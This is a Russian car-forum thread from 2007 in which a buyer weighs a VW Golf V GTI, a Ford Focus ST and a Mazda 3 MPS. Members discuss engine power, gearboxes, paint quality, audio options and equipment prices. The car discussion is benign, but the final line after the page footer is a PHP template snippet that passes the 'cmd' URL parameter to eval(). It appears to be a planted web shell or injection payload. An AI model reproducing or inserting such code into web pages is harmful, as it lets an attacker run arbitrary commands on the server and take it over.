+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 25

Тема: ВЫБОР


  1. #1
    Приветстсую всех форумчан!

    Будем знакомиться - Андрей.
    Я тут новенький, нашел я Вас быстро. Пройдясь беглым поиском по темам сего форума я так и не нашел подобную тему. Прошу Вас помочь мне не выбрать, так как в глубине души я давно выбор сделал, а убедить меня в правильности своего выбора.

    УСЛОВИЯ:
    Весной (скорее ближе к лету) я собираюсь приобрести новый горячий хэтчбек как первый автомобиль в семью. Опыт вождения у меня, Слава Богу, есть, до этого было два ТАЗика и один Чпокус. На данный момент пешеход.

    ВЫБОР:
    - Volkswagen Golf MkV GTI (6-МКПП)
    - Ford Focus ST
    - Mazda 3 MPS

    Душой и телом я за GTI, но моя любимая млеет от ST, а моё второе "я" жаждит 260 л.с. от 3 MPS с диференциалом.

    Люди успокойте... какнить... ;)

  2. #2
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    Попробую убедить за GTI.

    Почитав тест MPSки в зарулем и др изданиях, остался при своем мнении - больше 200 сил на переднем приводе невозможно реализовать. Если конечно не ездить все время по прямой. Ни электроника, ни дифф повышенного трения ни всякие балки для жесткости в этом деле конечно не помогут.
    Хотя в этом ценовом диапазоне аналогов нет. У нее вобще аналогов нет.

    Выбор же между GTI и Fordом с двигателем volvo для меня очевиден в пользу немца. Кстати на Focus могли поставить и тот же двигатель что стоит на MPS, но то ли японские двигателисты тормозили, то ли фордовцы торопились... Результат вольвовская пятерка. TFSI на мой взгляд очевидно лучше. Особенно в сочетании с DSG
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  3. #3
    Originally posted by chess@Jan 8 2007, 21:58
    Попробую убедить за GTI.
    DSG - я брать не буду, т.к. убежден в том, что ничего лучше механики для чистого драйверского кайфа нету! Я конечно согласен с тем, что секвентальные АКПП - это следуйщий шаг в эволюции КПП, можно даже сказать будущее всех КПП. Но пока я останусь с простой МКПП.

    + дешевле в обслуживании
    + надежней
    + эластичней
    - медленней на разгоне

    Если я возьму GTI я все равно буду его чиповать, т.е. мощность возрастет до 250 л.с. (может меньше, еще не задавался этим вопросом, т.к. пока не владею GTI)

    ВОПРОС:
    А зачем покупать GTI в самом начале, может взять ST (там 225 л.с. в стоке) или 3 MPS (260 л.с.)?

    ЗЫ: Расскажите о RDS 500 за $743? Стоит ли заказывать или штатной системы хватает (я не аудиофил!!!)?

    ЗЗЫ: Какой цене верить?
    на www.volkswagen.ru - GTI 6-МКПП за $33`624
    а в брошуре с того же сайта - $30`934

  4. #4
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    А вот я аудиофил, так что про rds ничего сказать не могу, музыку специально не заказывал.
    Лучший способ узнать цену - приехать в салон какой-нить и мс менеджером посидеть понабирать опции на стандартную комплектацию. Тогда точно узнаешь.
    Путаница с ценами может быть из-за того, что в 2006 году (не знаю как сейчас) была заводская скидка 8%. Может поэтому.
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  5. #5
    chess
    С манагером общаться буду ближе к делу... эдак в феврале, а пока решил своими силами разобраться... не люблю казаться некомпетентным с теми с кем я делаю или кому отдаю деньги!

    Пиндосы вот в легкую ставят усилки и сабы на штатную RDS-500. Там есть линейный выход? На Мацуде и Форде вообще убогие штатные системы... может кто подскажет как RDS в жизне?

    Выходы скорее всего паять прийдется у "ребят"! :rolleyes:

  6. #6
    GTI-Racing DUX is on a distinguished road Аватар для DUX
    Регистрация
    16.12.2006
    Откуда
    ВАО
    Машина
    VW .. 3.0 tdi
    Сообщений
    2,255
    Originally posted by MALONE@Jan 8 2007, 21:33
    ВЫБОР:
    - Volkswagen Golf MkV GTI (6-МКПП)
    - Ford Focus ST
    - Mazda 3 MPS
    считаю, что Мазда тот же Форд, тока интересней в плане спортивной, так сказать агрессивности) так что из "Фордов", голосую за Мазду!

    Гольф более комфортный + удобная тяга, считай для города самое то..

    ..короче, я бы сам задумался)

    и последнее, попробуй на тест-драйв машины, особенно Голф с DSG.
    ;)
    Если вдруг стало темно, не пугайтесь - вы обогнали свет.

  7. #7
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Originally posted by MALONE@Jan 8 2007, 22:33
    Приветстсую всех форумчан!

    Будем знакомиться - Андрей.
    Я тут новенький, нашел я Вас быстро. Пройдясь беглым поиском по темам сего форума я так и не нашел подобную тему. Прошу Вас помочь мне не выбрать, так как в глубине души я давно выбор сделал, а убедить меня в правильности своего выбора.

    УСЛОВИЯ:
    Весной (скорее ближе к лету) я собираюсь приобрести новый горячий хэтчбек как первый автомобиль в семью. Опыт вождения у меня, Слава Богу, есть, до этого было два ТАЗика и один Чпокус. На данный момент пешеход.

    ВЫБОР:
    - Volkswagen Golf MkV GTI (6-МКПП)
    - Ford Focus ST
    - Mazda 3 MPS

    Душой и телом я за GTI, но моя любимая млеет от ST, а моё второе "я" жаждит 260 л.с. от 3 MPS с диференциалом.

    Люди успокойте... какнить... ;)
    <div align='right'><{POST_SNAPBACK}></div>
    Поспрашивай лучше как у японцев краска слазит, (не поверил пока не увидел Мазду3, Хонду, Лексус), даже после скола и царапины налет мгновенно ржавый, так что не успеваешь доехать и замазать.
    Шумоизоляция из этих машин в прямом смысле - есть только у VW.

    Мотор ST и Мазды благодаря объему, легче и менее затратно доводится до 280-300 сил. В этом случае мазда за счет диффа наиболее предпочтительна.
    Кстати турбина на ST немецкая KKK04 как и у Ауди ТТ.

    Наверное лучше европейцы, там все же поуютней, а пластик в Мазде меня лично удручает. Спорт кар не гражданский можно сделать из любой из этих машин, но это уже не только мотор, готов ли ? или просто чипа за глаза, и надежность будет лучшим вариантом.
    Много ли из нас готовы справиться реально на 100% (а не в пол педали) на реальной дороге, с безопасностью для пешеходов и других водителей даже в 200-сот сильной машине, а не играть в шахматы на обычной дороге пока не улетят?
    песок сыпется....не останавливайтесь на достигнутом !

  8. #8
    Я вот тоже подумываю чтоб следуещее взять. выбор между мпс и г5. выбрал бы г5, но меня смущает цена, если комплектацию добрать до базовой мпс :-)) посмотрим какое будет предложение когда я денек накоплю :-))

    P/S/ даже на гольф4 2.0 базовая комплектуха была намного богаче нежели предлагают базу г5 г ти :-(((( обииидно

  9. #9
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Originally posted by bafomet@Jan 9 2007, 11:43
    Я вот тоже подумываю чтоб следуещее взять. выбор между мпс и г5. выбрал бы г5, но меня смущает цена, если комплектацию добрать до базовой мпс :-)) посмотрим какое будет предложение когда я денек накоплю :-))

    P/S/ даже на гольф4 2.0 базовая комплектуха была намного богаче нежели предлагают базу г5 г ти :-(((( обииидно
    <div align='right'><{POST_SNAPBACK}></div>
    Когда Мазда сможет сделать так, чтобы краска не слазила как чулок, тогда ее можно рассматривать. Да и салон пластмасовый тоже бы переделать.
    песок сыпется....не останавливайтесь на достигнутом !

  10. #10
    BON
    По поводу краски у японцев можешь мне не рассказывать, это просто 3.14пец... Долгое время хотел поменять свой бывший Чпокус 1.6 на Мазду 3 спорт. Но сейчас возможности подросли и я решил преобрести себе "зажигалку" С-класса.

    Критерии:
    - 4/5 дверный кузов (будет пополнение в семье)
    - новая. машину буду брать лишь на срок её гарантийного срока. При том, что в год я в среднем наматываю 50К.
    - более 200 т.л.с.
    - хорошая динамика
    - вместительный багажник
    - комфортный, эргономичный салон
    - не кожаный салон

    Претенденты (+/-)
    FORD FOCUS ST
    + яркий оранжевый цвет (милая моя просто без ума от него)
    + хорошая динамика
    + платформа С1 (кто ездил на Чпокусах тот поймет, в ней "что-то" есть)
    + раллийные гены (только неговорите, что там их совсем нет)
    - УБОГИЙ внешний и внутрений вид
    - толстожопый
    - ужасная музыка (даже мне понятно)

    комплектация:
    6SRS
    R18
    xenon
    dual-climat
    recaro seat front/back
    winter package (heated seats/mirrors/front window)
    8-speaker sound system MP3 SONY

    стоимость моей комплектации: &#036;35&#96;800

    MAZDA 3 MPS
    + безбашенная динамика
    + дифф
    - столько на переднем приводе, зае...т даже меня со временем...
    - ЛКП
    - отстойная музыка в стоке, даже BOSE

    комплектация
    6SRS
    R18
    xenon
    climat
    recaro front seats
    heated seats/mirrors
    9-speaker sound system BOSE w/ subwoofer under f/passanger seat

    стоимость моей комплектации: &#036;33&#96;390

    VOLKSWAGEN GOLF V GTI
    + хорошая динамика
    + качество
    + отличный дизайн как экстерьера (неброско) так и интерьера (всё там где и должно быть)
    + суперски смотриться в черном (в конце концов кому машину покупаю себе или милой???)
    + мотор (турбо+непосредственный впрыск)
    - медленнее остальных на МКПП (DSG я не хочу, и не убеждайте меня в обратно)
    - цена

    комплектация
    8SRS
    R17
    bi-xenon
    dual-climat
    Top Sport front seats
    winter package #1
    10-speaker sound system RDS 500 w/ navigation

    стоимость моей комплектации: &#036;39&#96;176

    ........

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Выбор шин
    от Undisputed в разделе Шины, диски
    Ответов: 39
    Последнее сообщение: 02.04.2024, 05:22
  2. Выбор тормозов на МК4, need help
    от TishONE в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 21
    Последнее сообщение: 09.02.2011, 00:43
  3. Выбор подвески на GTI 6
    от Opa_Opa в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 53
    Последнее сообщение: 08.12.2010, 19:00
  4. Выбор бибики
    от Nate в разделе Отзывы / Выбор
    Ответов: 0
    Последнее сообщение: 12.07.2009, 20:30
  5. выбор 1.8Т
    от DUX в разделе Отзывы / Выбор
    Ответов: 64
    Последнее сообщение: 06.03.2009, 12:11

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}